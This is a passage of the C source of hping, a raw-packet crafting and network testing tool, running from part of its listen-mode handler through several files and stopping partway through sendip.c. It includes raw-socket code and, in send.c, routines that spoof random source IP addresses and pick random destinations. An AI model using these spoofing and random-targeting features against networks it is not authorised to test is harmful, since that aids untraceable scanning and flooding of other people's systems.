memstr(ip_packet, sign, size))) { 60 | if (opt_verbose) 61 | fprintf(stderr, "packet %d received\n", id); 62 | 63 | if (opt_safe) { 64 | if (id == exp_id) 65 | exp_id++; 66 | else { 67 | if (opt_verbose) 68 | fprintf(stderr, "packet not in sequence (id %d) received\n", id); 69 | send_hcmp(HCMP_RESTART, exp_id); 70 | if (opt_verbose) 71 | fprintf(stderr, "HCMP restart from %d sent\n", exp_id); 72 | continue; /* discard this packet */ 73 | } 74 | } 75 | 76 | p+=strlen(sign); 77 | write(stdoutFD, p, size-(p-ip_packet)); 78 | } 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /logicmp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: logicmp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: logicmp.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include /* this should be not needed, but ip_icmp.h lacks it */ 15 | 16 | #include "hping2.h" 17 | #include "globals.h" 18 | 19 | void log_icmp_timeexc(char *src_addr, unsigned short icmp_code) 20 | { 21 | switch(icmp_code) { 22 | case ICMP_EXC_TTL: 23 | printf("TTL 0 during transit from ip=%s", src_addr); 24 | break; 25 | case ICMP_EXC_FRAGTIME: 26 | printf("TTL 0 during reassembly from ip=%s", src_addr); 27 | break; 28 | } 29 | if (opt_gethost) { 30 | char *hostn; 31 | 32 | fflush(stdout); 33 | hostn = get_hostname(src_addr); 34 | printf("name=%s", (hostn) ? hostn : "UNKNOWN"); 35 | } 36 | putchar('\n'); 37 | } 38 | 39 | void log_icmp_unreach(char *src_addr, unsigned short icmp_code) 40 | { 41 | static char* icmp_unreach_msg[]={ 42 | "Network Unreachable from", /* code 0 */ 43 | "Host Unreachable from", /* code 1 */ 44 | "Protocol Unreachable from", /* code 2 */ 45 | "Port Unreachable from", /* code 3 */ 46 | "Fragmentation Needed/DF set from", /* code 4 */ 47 | "Source Route failed from", /* code 5 */ 48 | NULL, /* code 6 */ 49 | NULL, /* code 7 */ 50 | NULL, /* code 8 */ 51 | NULL, /* code 9 */ 52 | NULL, /* code 10 */ 53 | NULL, /* code 11 */ 54 | NULL, /* code 12 */ 55 | "Packet filtered from", /* code 13 */ 56 | "Precedence violation from", /* code 14 */ 57 | "precedence cut off from" /* code 15 */ 58 | }; 59 | 60 | if (icmp_unreach_msg[icmp_code] != NULL) 61 | printf("ICMP %s ip=%s", icmp_unreach_msg[icmp_code], src_addr); 62 | else 63 | printf("ICMP Unreachable type=%d from ip=%s", 64 | icmp_code, src_addr); 65 | 66 | if (opt_gethost) { 67 | char *hostn; 68 | 69 | fflush(stdout); 70 | hostn = get_hostname(src_addr); 71 | printf("name=%s", (hostn) ? hostn : "UNKNOWN"); 72 | } 73 | putchar('\n'); 74 | } 75 | -------------------------------------------------------------------------------- /memlock.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memlock.c$ 4 | * $other_author: Alfonso De Gregorio 5 | * $other_copyright: Copyright (C) 1999 by Alfonso De Gregorio 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: memlock.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | int memlock(char *addr, size_t size) 17 | { 18 | #ifdef _POSIX_MEMLOCK_RANGE 19 | unsigned long page_offset, page_size; 20 | 21 | page_size = sysconf(_SC_PAGESIZE); /* also .. */ 22 | page_offset = (unsigned long) addr % page_size; 23 | 24 | addr -= page_offset; 25 | size += page_offset; 26 | 27 | return ( mlock(addr, size) ); 28 | #endif 29 | return (-1); 30 | } 31 | 32 | -------------------------------------------------------------------------------- /memlockall.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memlockall.c$ 4 | * $other_author: Alfonso De Gregorio 5 | * $other_copyright: Copyright (C) 1999 by Alfonso De Gregorio 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: memlockall.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | int memlockall(void) 17 | { 18 | /* #ifdef _POSIX_MEMLOCK */ 19 | /* NJ: better to test _POSIX_MEMLOCK value */ 20 | #if _POSIX_MEMLOCK == 1 21 | return ( mlockall(MCL_CURRENT|MCL_FUTURE) ); 22 | #endif 23 | return (-1); 24 | } 25 | 26 | -------------------------------------------------------------------------------- /memstr.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memstr.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 4$ 9 | */ 10 | 11 | /* $Id: memstr.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include /* NULL macro */ 15 | 16 | char *memstr(char *haystack, char *needle, int size) 17 | { 18 | char *p; 19 | char needlesize = strlen(needle); 20 | 21 | for (p = haystack; p <= (haystack-needlesize+size); p++) 22 | { 23 | if (memcmp(p, needle, needlesize) == 0) 24 | return p; /* found */ 25 | } 26 | return NULL; 27 | } 28 | -------------------------------------------------------------------------------- /memunlock.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memunlock.c$ 4 | * $other_author: Alfonso De Gregorio 5 | * $other_copyright: Copyright (C) 1999 by Alfonso De Gregorio 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: memunlock.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | int memunlock(char *addr, size_t size) 17 | { 18 | #ifdef _POSIX_MEMLOCK_RANGE 19 | unsigned long page_offset, page_size; 20 | 21 | page_size = sysconf(_SC_PAGESIZE); 22 | page_offset = (unsigned long) addr % page_size; 23 | 24 | addr -= page_offset; 25 | size += page_offset; 26 | 27 | return ( munlock(addr, size) ); 28 | #endif 29 | return (-1); 30 | } 31 | -------------------------------------------------------------------------------- /memunlockall.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: memunlockall.c$ 4 | * $other_author: Alfonso De Gregorio 5 | * $other_copyright: Copyright (C) 1999 by Alfonso De Gregorio 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 2$ 9 | */ 10 | 11 | /* $Id: memunlockall.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | int memunlockall(void) 17 | { 18 | /* #ifdef _POSIX_MEMLOCK */ 19 | /* NJ: better to test _POSIX_MEMLOCK value */ 20 | #if _POSIX_MEMLOCK == 1 21 | return ( munlockall() ); 22 | #endif 23 | return(-1); 24 | } 25 | 26 | -------------------------------------------------------------------------------- /opensockraw.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: opensockraw.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: opensockraw.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include /* IPPROTO_RAW def. */ 17 | 18 | int open_sockraw() 19 | { 20 | int s; 21 | 22 | s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); 23 | if (s == -1) { 24 | perror("[open_sockraw] socket()"); 25 | return -1; 26 | } 27 | 28 | return s; 29 | } 30 | -------------------------------------------------------------------------------- /random.c: -------------------------------------------------------------------------------- 1 | /* rc4-based pseudo-random number generator for hping. 2 | * Copyright (C) 2003 Salvatore Sanfilippo 3 | * This software is released under the GPL license 4 | * All rights reserved */ 5 | 6 | /* $Id: random.c,v 1.3 2004/06/04 07:22:38 antirez Exp $ */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include "fixtypes.h" 15 | 16 | u_int32_t hp_rand(void); 17 | 18 | /* The rc4 sbox */ 19 | static unsigned char rc4_sbox[256]; 20 | /* This flags is used to initialize the sbox the first time, 21 | * without an explicit intialization step outside this file. */ 22 | static int rc4_seedflag = 0; 23 | 24 | /* Initialize the sbox with pseudo random data */ 25 | static void hp_rand_init(void) 26 | { 27 | int i, fd; 28 | 29 | /* Strong sbox initialization */ 30 | fd = open("/dev/urandom", O_RDONLY); 31 | if (fd != -1) { 32 | read(fd, rc4_sbox, 256); 33 | close(fd); 34 | } 35 | /* Weaker sbox initialization */ 36 | for (i = 0; i < 256; i++) { 37 | struct timeval tv; 38 | gettimeofday(&tv, NULL); 39 | if (i&1) 40 | rc4_sbox[i] ^= (tv.tv_usec >> (i&0xF)) & 0xFF; 41 | else 42 | rc4_sbox[i] ^= (tv.tv_sec >> (i&0xF)) & 0xFF; 43 | } 44 | rc4_seedflag = 1; 45 | } 46 | 47 | #if 0 48 | /* Re-seed the generator with user-provided bytes. Not used for now. */ 49 | static void hp_rand_seed(void *seed, size_t len) 50 | { 51 | int i; 52 | 53 | if (len > 256) len = 256; 54 | memcpy(rc4_sbox, seed, len); 55 | /* discard the first 256 bytes of output after the reseed */ 56 | for (i = 0; i < 32; i++) 57 | (void) hp_rand(); 58 | } 59 | #endif 60 | 61 | /* Generates a 32bit random number using an RC4-like algorithm */ 62 | u_int32_t hp_rand(void) 63 | { 64 | u_int32_t r = 0; 65 | unsigned char *rc = (unsigned char*) &r; 66 | static unsigned int i = 0, j = 0; 67 | unsigned int si, sj, x; 68 | 69 | /* initialization, only needed the first time */ 70 | if (!rc4_seedflag) 71 | hp_rand_init(); 72 | /* generates 4 bytes of pseudo-random data using RC4 */ 73 | for (x = 0; x < 4; x++) { 74 | i = (i+1) & 0xff; 75 | si = rc4_sbox[i]; 76 | j = (j + si) & 0xff; 77 | sj = rc4_sbox[j]; 78 | rc4_sbox[i] = sj; 79 | rc4_sbox[j] = si; 80 | *rc++ = rc4_sbox[(si+sj)&0xff]; 81 | } 82 | return r; 83 | } 84 | 85 | -------------------------------------------------------------------------------- /release.h: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: release.h$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 16 11:55:49 MET 1999$ 8 | * $rev: 17$ 9 | */ 10 | 11 | #ifndef _RELEASE_H 12 | #define _RELEASE_H 13 | 14 | #define RELEASE_VERSION "3.0.0-alpha-1" 15 | #define RELEASE_DATE "$Id: release.h,v 1.4 2004/04/09 23:38:56 antirez Exp $" 16 | #define CONTACTS "" 17 | 18 | #endif /* _RELEASE_H */ 19 | -------------------------------------------------------------------------------- /relid.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: relid.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 3$ 9 | */ 10 | 11 | /* FIXME: maybe it's better to avoid division per seq_diff and 12 | at least add an option to switch on/off this feature */ 13 | 14 | /* $Id: relid.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 15 | 16 | #include "hping2.h" 17 | #include "globals.h" 18 | 19 | int relativize_id(int seqnum, int *ip_id) 20 | { 21 | int seq_diff, backup_id; 22 | static int last_seq = 0, last_id = -1; 23 | 24 | backup_id = *ip_id; 25 | 26 | if (last_id == -1) { 27 | last_id = *ip_id; 28 | last_seq = seqnum; 29 | } 30 | else 31 | { 32 | if ( (seq_diff=(seqnum-last_seq)) > 0) 33 | { 34 | if (last_id > *ip_id) /* rew */ 35 | *ip_id = ((65535-last_id) 36 | + *ip_id)/seq_diff; 37 | else 38 | *ip_id = (*ip_id-last_id) 39 | /seq_diff; 40 | last_id = backup_id; 41 | last_seq = seqnum; 42 | return TRUE; 43 | } else { 44 | out_of_sequence_pkt++; 45 | } 46 | } 47 | return FALSE; 48 | } 49 | -------------------------------------------------------------------------------- /resolve.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: resolve.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: resolve.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | /* On error -1 is returned, on success 0 */ 23 | int resolve_addr(struct sockaddr * addr, char *hostname) 24 | { 25 | struct sockaddr_in *address; 26 | struct hostent *host; 27 | 28 | address = (struct sockaddr_in *)addr; 29 | 30 | memset(address, 0, sizeof(struct sockaddr_in)); 31 | address->sin_family = AF_INET; 32 | address->sin_addr.s_addr = inet_addr(hostname); 33 | 34 | if ( (int)address->sin_addr.s_addr == -1) { 35 | host = gethostbyname(hostname); 36 | if (host) { 37 | memcpy(&address->sin_addr, host->h_addr, 38 | host->h_length); 39 | return 0; 40 | } else { 41 | return -1; 42 | } 43 | } 44 | return 0; 45 | } 46 | 47 | /* Like resolve_addr but exit on error */ 48 | void resolve(struct sockaddr *addr, char *hostname) 49 | { 50 | if (resolve_addr(addr, hostname) == -1) { 51 | fprintf(stderr, "Unable to resolve '%s'\n", hostname); 52 | exit(1); 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /rtt.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: rtt.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 3$ 9 | */ 10 | 11 | /* $Id: rtt.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | #include "hping2.h" 17 | #include "globals.h" 18 | 19 | void minavgmax(float ms_delay) 20 | { 21 | static int avg_counter = 0; 22 | 23 | if (rtt_min == 0 || ms_delay < rtt_min) 24 | rtt_min = ms_delay; 25 | if (rtt_max == 0 || ms_delay > rtt_max) 26 | rtt_max = ms_delay; 27 | avg_counter++; 28 | rtt_avg = (rtt_avg*(avg_counter-1)/avg_counter)+(ms_delay/avg_counter); 29 | } 30 | 31 | int rtt(int *seqp, int recvport, float *ms_delay) 32 | { 33 | long sec_delay = 0, usec_delay = 0; 34 | int i, tablepos = -1, status; 35 | 36 | if (*seqp != 0) { 37 | for (i = 0; i < TABLESIZE; i++) 38 | if (delaytable[i].seq == *seqp) { 39 | tablepos = i; 40 | break; 41 | } 42 | } else { 43 | for (i=0; i 5 | 6 | extern char *cset; 7 | extern int8_t r_cset[256]; 8 | extern int8_t bitstable[256]; 9 | extern double basetable[37]; 10 | struct sbn_basepow { 11 | unsigned long maxpow; 12 | unsigned long maxexp; 13 | }; 14 | extern struct sbn_basepow basepowtable[37]; 15 | 16 | #endif /* _SBN_TABLES_H */ 17 | -------------------------------------------------------------------------------- /sbignum.h: -------------------------------------------------------------------------------- 1 | /* Sbignum.h -- antirez's arbitrary precision integer math library header file. 2 | * Copyright(C) 2002-2003 Salvatore Sanfilippo. 3 | * All rights reserved. 4 | * 5 | * $Id: sbignum.h,v 1.4 2004/06/04 07:22:38 antirez Exp $ 6 | */ 7 | 8 | #ifndef _SBIGNUM_H 9 | #define _SBIGNUM_H 10 | 11 | #include 12 | #include "fixtypes.h" 13 | 14 | #define ATOMBYTES 4 15 | 16 | /* The number internal rappresentation is an array of mpz_atom_t WORDS. 17 | * Every byte is a digit in base MPZ_AND+1, the first word is the least 18 | * significant word and so on */ 19 | #if ATOMBYTES == 4 20 | typedef u_int32_t mpz_atom_t; 21 | typedef u_int64_t mpz_carry_t; 22 | typedef int64_t mpz_scarry_t; 23 | #elif ATOMBYTES == 2 24 | typedef u_int16_t mpz_atom_t; 25 | typedef u_int32_t mpz_carry_t; 26 | typedef int32_t mpz_scarry_t; 27 | #elif ATOMBYTES == 1 28 | typedef u_int8_t mpz_atom_t; 29 | typedef u_int32_t mpz_carry_t; 30 | typedef int32_t mpz_scarry_t; 31 | #else 32 | #error "Please define ATOMBYTES" 33 | #endif 34 | 35 | #define ATOMBITS (ATOMBYTES*8) 36 | 37 | #define MPZ_ATOMSZ (sizeof(mpz_atom_t)) 38 | #define MPZ_MASK ((mpz_atom_t)(~0)) 39 | #define MPZ_SHIFT (MPZ_ATOMSZ*8) 40 | #define MPZ_BASE ((mpz_carry_t)MPZ_MASK+1) 41 | 42 | struct struct_sbnz { 43 | mpz_atom_t *d; /* data the least significant word is d[0] */ 44 | u_int32_t a; /* allocated bytes */ 45 | u_int32_t l; /* number of used bytes */ 46 | u_int32_t s; /* sign. non-zero if negative */ 47 | }; 48 | /* define the sbnz type */ 49 | typedef struct struct_sbnz *mpz_ptr; 50 | typedef struct struct_sbnz mpz_t[1]; 51 | 52 | /* Error codes */ 53 | enum sbn_err { 54 | SBN_OK = 0, 55 | SBN_MEM, 56 | SBN_INVAL 57 | }; 58 | 59 | #define SBN_MINBASE 2 60 | #define SBN_MAXBASE 36 61 | 62 | /* Exported macros */ 63 | 64 | /* this macro is true if z == 0 */ 65 | #define _mpz_iszero(z) ((z)->l == 0) 66 | 67 | /* this is just the reverse. Equivalent to !_mpz_iszero */ 68 | #define _mpz_nonzero(z) ((z)->l != 0) 69 | 70 | #define mpz_inc(z) mpz_add_ui(z, z, 1) 71 | #define mpz_dec(z) mpz_sub_ui(z, z, 1) 72 | 73 | /* ----------------------- Functions prototypes ----------------------------- */ 74 | 75 | /* inititialization/allocation */ 76 | void mpz_init(mpz_ptr z); 77 | void mpz_clear(mpz_ptr z); 78 | int mpz_realloc(mpz_ptr z, u_int32_t i); 79 | /* shifting */ 80 | int mpz_lshift(mpz_ptr r, mpz_ptr z, u_int32_t i); 81 | int mpz_rshift(mpz_ptr r, mpz_ptr z, u_int32_t i); 82 | /* comparision */ 83 | int32_t mpz_abscmp(mpz_ptr a, mpz_ptr b); 84 | int32_t mpz_abscmp_ui(mpz_ptr a, u_int32_t u); 85 | int32_t mpz_cmp(mpz_ptr a, mpz_ptr b); 86 | #define mpz_eq(a,b) (mpz_cmp(a,b) == 0) 87 | #define mpz_noteq(a,b) (mpz_cmp(a,b) != 0) 88 | #define mpz_lt(a,b) (mpz_cmp(a,b) < 0) 89 | #define mpz_le(a,b) (mpz_cmp(a,b) <= 0) 90 | #define mpz_gt(a,b) (mpz_cmp(a,b) > 0) 91 | #define mpz_ge(a,b) (mpz_cmp(a,b) >= 0) 92 | int32_t mpz_cmp_ui(mpz_ptr a, u_int32_t u); 93 | int32_t mpz_cmp_si(mpz_ptr a, int32_t s); 94 | #define mpz_eq_si(a,s) (mpz_cmp_si(a,s) == 0) 95 | #define mpz_noteq_si(a,s) (mpz_cmp_si(a,s) != 0) 96 | #define mpz_lt_si(a,s) (mpz_cmp_si(a,s) < 0) 97 | #define mpz_le_si(a,s) (mpz_cmp_si(a,s) <= 0) 98 | #define mpz_gt_si(a,s) (mpz_cmp_si(a,s) > 0) 99 | #define mpz_ge_si(a,s) (mpz_cmp_si(a,s) >= 0) 100 | /* addition */ 101 | int mpz_add_ui(mpz_ptr r, mpz_ptr z, u_int32_t u); 102 | int mpz_add_si(mpz_ptr r, mpz_ptr z, int32_t s); 103 | int mpz_add(mpz_ptr r, mpz_ptr a, mpz_ptr b); 104 | /* subtraction */ 105 | int mpz_sub_ui(mpz_ptr r, mpz_ptr z, u_int32_t u); 106 | int mpz_sub_si(mpz_ptr r, mpz_ptr z, int32_t s); 107 | int mpz_sub(mpz_ptr r, mpz_ptr a, mpz_ptr b); 108 | /* multiplication */ 109 | int mpz_mul(mpz_ptr r, mpz_ptr z, mpz_ptr f); 110 | int mpz_mul_ui(mpz_ptr r, mpz_ptr z, u_int32_t u); 111 | int mpz_mul_si(mpz_ptr r, mpz_ptr z, int32_t s); 112 | int mpz_fac_ui(mpz_ptr r, u_int32_t i); 113 | /* exponentialization */ 114 | int mpz_powm(mpz_ptr r, mpz_ptr b, mpz_ptr e, mpz_ptr m); 115 | int mpz_pow(mpz_ptr r, mpz_ptr b, mpz_ptr e); 116 | /* division */ 117 | int mpz_tdiv_qr(mpz_ptr q, mpz_ptr r, mpz_ptr z, mpz_ptr d); 118 | int mpz_tdiv_qr_ui(mpz_ptr q, mpz_ptr r, mpz_ptr z, u_int32_t u); 119 | int mpz_tdiv_qr_si(mpz_ptr q, mpz_ptr r, mpz_ptr z, int32_t s); 120 | int mpz_tdiv_q(mpz_ptr q, mpz_ptr z, mpz_ptr d); 121 | int mpz_tdiv_q_ui(mpz_ptr q, mpz_ptr z, u_int32_t u); 122 | int mpz_tdiv_q_si(mpz_ptr q, mpz_ptr z, int32_t s); 123 | int mpz_tdiv_r(mpz_ptr r, mpz_ptr z, mpz_ptr d); 124 | int mpz_tdiv_r_ui(mpz_ptr r, mpz_ptr z, u_int32_t u); 125 | int mpz_tdiv_r_si(mpz_ptr r, mpz_ptr z, int32_t s); 126 | int mpz_mod(mpz_ptr r, mpz_ptr z, mpz_ptr m); 127 | /* root extraction */ 128 | int mpz_sqrt(mpz_ptr r, mpz_ptr z); 129 | /* assignment */ 130 | int mpz_setzero(mpz_ptr z); 131 | int mpz_set(mpz_ptr d, mpz_ptr s); 132 | int mpz_set_ui(mpz_ptr z, u_int32_t u); 133 | int mpz_set_si(mpz_ptr z, int32_t s); 134 | int mpz_abs(mpz_ptr d, mpz_ptr s); 135 | int mpz_neg(mpz_ptr d, mpz_ptr s); 136 | /* bit operations */ 137 | u_int32_t mpz_bits(mpz_ptr z); 138 | int mpz_setbit(mpz_ptr z, u_int32_t i); 139 | int mpz_clrbit(mpz_ptr z, u_int32_t i); 140 | int mpz_testbit(mpz_ptr z, u_int32_t i); 141 | /* number theoretic functions */ 142 | int mpz_gcd(mpz_ptr g, mpz_ptr a, mpz_ptr b); 143 | u_int32_t mpz_gcd_ui(mpz_ptr g, mpz_ptr a, u_int32_t b); 144 | /* to/from mpz conversions */ 145 | size_t mpz_sizeinbase(mpz_ptr z, u_int32_t b); 146 | char *mpz_get_str(char *str, int b, mpz_ptr z); 147 | int mpz_set_str(mpz_ptr z, char *s, int b); 148 | double mpz_get_d(mpz_ptr z); 149 | int mpz_set_d(mpz_ptr z, double d); 150 | int mpz_set_si64(mpz_ptr z, int64_t s); 151 | int mpz_set_ui64(mpz_ptr z, u_int64_t u); 152 | /* random numbers */ 153 | u_int32_t sbn_rand(void); 154 | void sbn_seed(void *seed, size_t len); 155 | int mpz_random(mpz_ptr z, int32_t len); 156 | 157 | #endif /* _SBIGNUM_H */ 158 | -------------------------------------------------------------------------------- /send.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendudp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: send.c,v 1.1.1.1 2003/08/31 17:23:53 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | static void select_next_random_source(void) 25 | { 26 | unsigned char ra[4]; 27 | 28 | ra[0] = hp_rand() & 0xFF; 29 | ra[1] = hp_rand() & 0xFF; 30 | ra[2] = hp_rand() & 0xFF; 31 | ra[3] = hp_rand() & 0xFF; 32 | memcpy(&local.sin_addr.s_addr, ra, 4); 33 | 34 | if (opt_debug) 35 | printf("DEBUG: the source address is %u.%u.%u.%u\n", 36 | ra[0], ra[1], ra[2], ra[3]); 37 | } 38 | 39 | static void select_next_random_dest(void) 40 | { 41 | unsigned char ra[4]; 42 | char a[4], b[4], c[4], d[4]; 43 | 44 | if (sscanf(targetname, "%4[^.].%4[^.].%4[^.].%4[^.]", a, b, c, d) != 4) 45 | { 46 | fprintf(stderr, 47 | "wrong --rand-dest target host, correct examples:\n" 48 | " x.x.x.x, 192,168.x.x, 128.x.x.255\n" 49 | "you typed: %s\n", targetname); 50 | exit(1); 51 | } 52 | a[3] = b[3] = c[3] = d[3] = '\0'; 53 | 54 | ra[0] = a[0] == 'x' ? (hp_rand() & 0xFF) : strtoul(a, NULL, 0); 55 | ra[1] = b[0] == 'x' ? (hp_rand() & 0xFF) : strtoul(b, NULL, 0); 56 | ra[2] = c[0] == 'x' ? (hp_rand() & 0xFF) : strtoul(c, NULL, 0); 57 | ra[3] = d[0] == 'x' ? (hp_rand() & 0xFF) : strtoul(d, NULL, 0); 58 | memcpy(&remote.sin_addr.s_addr, ra, 4); 59 | 60 | if (opt_debug) { 61 | printf("DEBUG: the dest address is %u.%u.%u.%u\n", 62 | ra[0], ra[1], ra[2], ra[3]); 63 | } 64 | } 65 | 66 | /* The signal handler for SIGALRM will send the packets */ 67 | void send_packet (int signal_id) 68 | { 69 | int errno_save = errno; 70 | 71 | if (opt_rand_dest) 72 | select_next_random_dest(); 73 | if (opt_rand_source) 74 | select_next_random_source(); 75 | 76 | if (opt_rawipmode) send_rawip(); 77 | else if (opt_icmpmode) send_icmp(); 78 | else if (opt_udpmode) send_udp(); 79 | else send_tcp(); 80 | 81 | sent_pkt++; 82 | Signal(SIGALRM, send_packet); 83 | 84 | if (count != -1 && count == sent_pkt) { /* count reached? */ 85 | Signal(SIGALRM, print_statistics); 86 | alarm(COUNTREACHED_TIMEOUT); 87 | } else if (!opt_listenmode) { 88 | if (opt_waitinusec == FALSE) 89 | alarm(sending_wait); 90 | else 91 | setitimer(ITIMER_REAL, &usec_delay, NULL); 92 | } 93 | errno = errno_save; 94 | } 95 | -------------------------------------------------------------------------------- /sendhcmp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendhcmp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 4$ 9 | */ 10 | 11 | /* $Id: sendhcmp.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include /* SIGALARM macro */ 17 | 18 | #include "hping2.h" 19 | #include "globals.h" 20 | 21 | #define MUST_BE_UNREACHED 0 22 | 23 | void send_hcmp(__u8 type, __u32 arg) 24 | { 25 | static struct hcmphdr hcmph; /* static because we export this */ 26 | /* to data_handler() */ 27 | 28 | data_size = signlen + sizeof(struct hcmphdr); 29 | 30 | /* build hcmp header */ 31 | memset(&hcmph, 0, sizeof(hcmph)); 32 | hcmph.type = type; 33 | switch (type) 34 | { 35 | case HCMP_RESTART: 36 | hcmph.typedep.seqnum = htons((__u16) arg); 37 | break; 38 | case HCMP_SOURCE_QUENCH: 39 | case HCMP_SOURCE_STIRUP: 40 | hcmph.typedep.usec = htonl(arg); 41 | break; 42 | default: 43 | assert(MUST_BE_UNREACHED); 44 | } 45 | 46 | /* use hcmphdr_p to transmit hcmph to data_handler() */ 47 | hcmphdr_p = &hcmph; 48 | kill(getpid(), SIGALRM); /* send hcmp */ 49 | 50 | return; 51 | } 52 | -------------------------------------------------------------------------------- /sendip.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendip.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sendip.c,v 1.2 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | void send_ip (char* src, char *dst, char *data, unsigned int datalen, 25 | int more_fragments, unsigned short fragoff, char *options, 26 | char optlen) 27 | { 28 | char *packet; 29 | int result, 30 | packetsize; 31 | struct myiphdr *ip; 32 | 33 | packetsize = IPHDR_SIZE + optlen + datalen; 34 | if ( (packet = malloc(packetsize)) == NULL) { 35 | perror("[send_ip] malloc()"); 36 | return; 37 | } 38 | 39 | memset(packet, 0, packetsize); 40 | ip = (struct myiphdr*) packet; 41 | 42 | /* copy src and dst address */ 43 | memcpy(&ip->saddr, src, sizeof(ip->saddr)); 44 | 